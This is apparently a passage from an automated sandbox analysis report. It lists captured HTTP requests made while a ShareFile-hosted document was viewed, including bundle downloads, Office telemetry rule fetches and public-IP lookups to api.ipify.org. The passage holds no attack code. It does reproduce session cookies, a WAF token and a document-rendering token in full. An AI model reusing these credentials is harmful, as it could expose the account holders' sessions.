            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)/Items(st31ee83-7bff-445d-8b76-231696d63572)/ProtocolLinks(Web)?action=View HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=/1sLx+WFi8qCXjY7fp01c6IWLH/QaDpH6zhAoTyAVTS3qYoPE2Fj+3hiswQIcrjDdmVKiRwaLUmlS83hmzWBQGKn/SH6V6lxSwIVE51GDd1RZ0bWq8vQSs2YeDdnAOWY+NCc/Uxc6ZeihwGq0+8ljGgYL4qRqE8tARx9az4NRJ+e; AWSALB=j2hBEYCKBMRxcB/4e1moxSRiflSj/VGGA4eRDyb3xDP5xKTxakKaInih+XdpVjQ6XIUhiihcXf/aH3uECQ7Z8I+WBap2toLAez0Ij2YnEIubjYuQHXSG5l6cQUrH; AWSALBTGCORS=a96IKFWMnhpZ9dQpggnXYobyYignSa/9OUn+gJzWNB+fFGA+0k/4vFpZW6qFQsbxiyuntM7yMUY73o0iKf3kkyis2bxKJanh/FfDm3fTgymTppT4HOyAXxQPOAa4NAPOYIXJ1Tc9h/bIjsD4UhBjMDxwhLauujinhvqhOaK1gdTi; AWSALBCORS=LSSfnSfLHXFdc+WTe0oiUISwkWdBrxRw/9C+Borv24QtYlm8MwhlKzzRTADV4mz5mN7SOGJWoyvc6wt9orKEN0aAnf0IOSk69N4BDHmLbVe4dQ6dvrDmu2Q03hVk
            Source: global trafficHTTP traffic detected: GET /bundles/5626aad50bfaf67fedc0.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALBTGCORS=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALB=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW; AWSALBCORS=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW
            Source: global trafficHTTP traffic detected: GET /bundles/2c61db7618456a4b4ea2.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=Aqb+bt/mra9EOqUh2YsJUDiI//OTWmYhtPkbLccpN1GEWQjTkJ7XaxiyMufrVf5kBqhvLBeJFrYprA7U/bBBgLBvMz0C9ZW0AoWr/++/nRDrbGtkaVk2OUw4MI2o8s552NXeGCVNfM5xIhum6hWvEvhYwODAF9SgyEzEKXEdW9ve; AWSALBTGCORS=Aqb+bt/mra9EOqUh2YsJUDiI//OTWmYhtPkbLccpN1GEWQjTkJ7XaxiyMufrVf5kBqhvLBeJFrYprA7U/bBBgLBvMz0C9ZW0AoWr/++/nRDrbGtkaVk2OUw4MI2o8s552NXeGCVNfM5xIhum6hWvEvhYwODAF9SgyEzEKXEdW9ve; AWSALB=QpwayvxD4VzLqhsksr1125CqtfNe1PHUEt/C3ObNyuJbwlYB0WFbvQ5qNVmJRbgq8yXNFI8zZ+Iz+k0WOOlvboW6vNlehiHame1G5osj0WJHZqT8X+fMD2iM0iSV; AWSALBCORS=QpwayvxD4VzLqhsksr1125CqtfNe1PHUEt/C3ObNyuJbwlYB0WFbvQ5qNVmJRbgq8yXNFI8zZ+Iz+k0WOOlvboW6vNlehiHame1G5osj0WJHZqT8X+fMD2iM0iSV
            Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/5626aad50bfaf67fedc0.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALBTGCORS=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALB=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp; AWSALBCORS=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp
            Source: global trafficHTTP traffic detected: GET /bundles/d5a7899d41651404accd.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALBTGCORS=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALB=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp; AWSALBCORS=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp
            Source: global trafficHTTP traffic detected: GET /bundles/102a12cf4db82175eb4a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALBTGCORS=Uw27P+pXBuvYRJBf3xMcc6SRRGADADyLlVsdJ0Sb8B2aJEq74NLxav98/UlfvANPvHh+tMee1EyXeKbAzhn1b6by701UxNPR+nYlpi9pnDYd+1kQsC868sG0l2obwJWmsprWJZGM6sSYWgABE8IWA1XbxTOb17pvcr4yDpnPHWs0; AWSALB=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp; AWSALBCORS=rYQiOYFd00wKt54bZMIACkQryq9z0CspUggLBopo5UzFeNQG2eevTiNp1A2duDIXaRBW3MzhUWW350gHv2F/gKTeG2RlRzF2a3rg8faQ34k1vQfLY2lFA1SSGSRp
            Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /service/contentviewer/document/sessionurl HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /service/rendering/api/render/pdf?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..TDRVBitYthIsXIkhMr3Lmg.nlXorZ1tVCpOQv9gfmDAI4l76kv1bj_DKTKLqYo_X6wG7hbuX5mzfLN2xR-RlKLOATEzkspayN2ZxP93iaXOXcMmAzmMB8GSWLI7FrbyraKd7nGPGA8PHR1aA9yHVaLkzxsMId6IAX-0gm9nvqmyQvTDN4YztqUgaaF_DLPoRGl-B3TdnV_h_7_LivV6ZPOcXXaqSiZO0E_oP3ARDPHF7JjLheed1EAKRRAM3c3e8MEJmBG-d3NJdQPHf8BgrWrJJt075ze1_lCQ_SQDVJbfA2Keb7vDwUb-QNN-mMQmUL03-Tu2fhWZ1qpWuEwIcpHUcUWF-UYC8sgwj81RQJUNpNhitP7chzsA_Z4nMr-QSgsmE5Gz4-BkRUAipF0qtpuB40n6g3mHFUWQHys_I4tAfzPcARzKaAVU-wR7Ak5klLwQqOE37oJnME7IiMKEWZQxRqTEcHdHc4EmEIXBThQGWfzOlfO1uKJtoKvJyZGCZHnia-JRCUH9tF6estxubEAAKFZDnd6rhaP1JaCqqrzZNv77c0oZxJnDA0OfJjF5MtHVRDuE8cAJDZYVTOH9Xm6CS9Hvl9cman2diTlpdUGoJiWokqKb8YShjmRnszOklgzovAIFiwpvRU24zb5Pl11BMPlG3Avlo03qyGuFbxnFwL7IAz1KYe9gUefsCRCBDukO1p2L5sj8UAlq9cse2JkNJ2XvWFLLCgSYmOcLSKpUWwTiZmAPPVL47kg6o-glf1w9n3QMEjfyMCO1Ze4PMApcOQtJdLON2HjcILrfCUjt3YDVYLHHocdZ1O2CdQHU1MuZTuCD6oa8pM3zB-CwjQvHKPBdUt8AWVhzrG0BlUe9X6x7MhwNwiuX52_LUeHiO4LnQqYYcR91Cu5aQK5HQr2EJ_g9CXiaoZFrItvHbX9r0o5oOM2gl6ff2TTU1AtsFFpzHRNfigtMTYWpHBsUSbd9cvwLeed9f2LmDTD1LrkrmKAYF4E_yAixlFVQDccm8lxM-nefz4UTzhszvsCwHQBARqnJlBESPhqwcrZtTqT5R8DHmIjHP8qutp9egcTHrSxuIHOESATQeg4_LR9g20PSaezGpBd_e8pLzMkE2vyEK61xcpShjNccqeUmt5pTZIPyTnQPjiEnHeer6x7oej2UiPJW3f_poMwZP1oIdBh1EAP3b9Nt-UI2e9K6DQ2sA3AAsWjo4aQczAN84JQCpJ2Nv6Of7PV5wv9Tg8PmwYbFE0ijGdQV_1rglnjnReaM5h5p_mFi0nPwVTq9BfMBZXq44boGgcwnpo6Sv_WWZ6w17OAAQDmE7Qy10OIvKyDZwo2DCiJis3v7as52U15wzyAjMyb82Hmm-5KuWlGKwZ6Oes-XcU_CjmH0lO0XVr9dR58Kp7mUKuGBc_wWpkDlpZAYdhItHDLFgbVMKXGvH3WCN6TDvMsJrJqXNJ0FzlmbXYU_uIKxtejsmoXZ5T6nwfClvddBBx3VH3WV-UERTuVEsKRP1eztwcOfSfOY73Lk5Ml4JImm5WiCmYTJyyqTaaA6-tFzYPuDxFHTEcu3gJmvrXBq9lewgnL0NYW15mrQ5w5A1gaTDP3BiWE4Y2RBrSjQvAie9kirNRUW35u9R7F84rMGux-Vfcfpr7bB3wRKV6av9eZTFC8GlsXu0_2fdi6m6bhTxqpupeoJ2lTdwN4kXLUI2h3oizQ3Yu5c-QLDOvPqrTIzZYf-ZtnxQZsMp_f6K-_QvK9_VIBDwoFvlYcRfukZVPdAsWfY1q3zq6j7yKzdH7e-nHjK3kqEFOVynfwZ2xZoOcWHiax55pja3prrGiqXFrJfTp52yTFEgs07JAuAGqVJRFvCg8heb915se5vfStCjnZoCPMnkEOn-YdCdg.C1wIlQawUHDi2eYpEzyNXw HTTP/1.1Host: sf-renderx-us-east-1.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/pdfworker.71b2fed3d97c2433b14536a2de71ac7a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=a7NxDbloek2if+EM0ZKFdwYToaHAziDZZITKtfc2oZZ6/04n61g1Nf2IXjKE+5u8zaX1ArJIhlctAIIwpPqcVfS0ZeT5Xt0Hhi9b6aj2P0H+mNPvN2y9yR4B7Q2x4XY1Z4DCr5k78I38Ooe8xG4wLupPD2/vs5LKUivCNf5fU8Tn; AWSALBTGCORS=a7NxDbloek2if+EM0ZKFdwYToaHAziDZZITKtfc2oZZ6/04n61g1Nf2IXjKE+5u8zaX1ArJIhlctAIIwpPqcVfS0ZeT5Xt0Hhi9b6aj2P0H+mNPvN2y9yR4B7Q2x4XY1Z4DCr5k78I38Ooe8xG4wLupPD2/vs5LKUivCNf5fU8Tn; AWSALB=ODWJhkuFAWF65oyB68csaPBoqON+JdOik8plhKtPDZKfqJ6EDfzUYJWoDaUQB6eDilUX7XKZy73LK5QO4y/enhd3Fo1tRe8ke5v7f2xe4PTdGaAJhRsl7rcf13Si; AWSALBCORS=ODWJhkuFAWF65oyB68csaPBoqON+JdOik8plhKtPDZKfqJ6EDfzUYJWoDaUQB6eDilUX7XKZy73LK5QO4y/enhd3Fo1tRe8ke5v7f2xe4PTdGaAJhRsl7rcf13Si
            Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
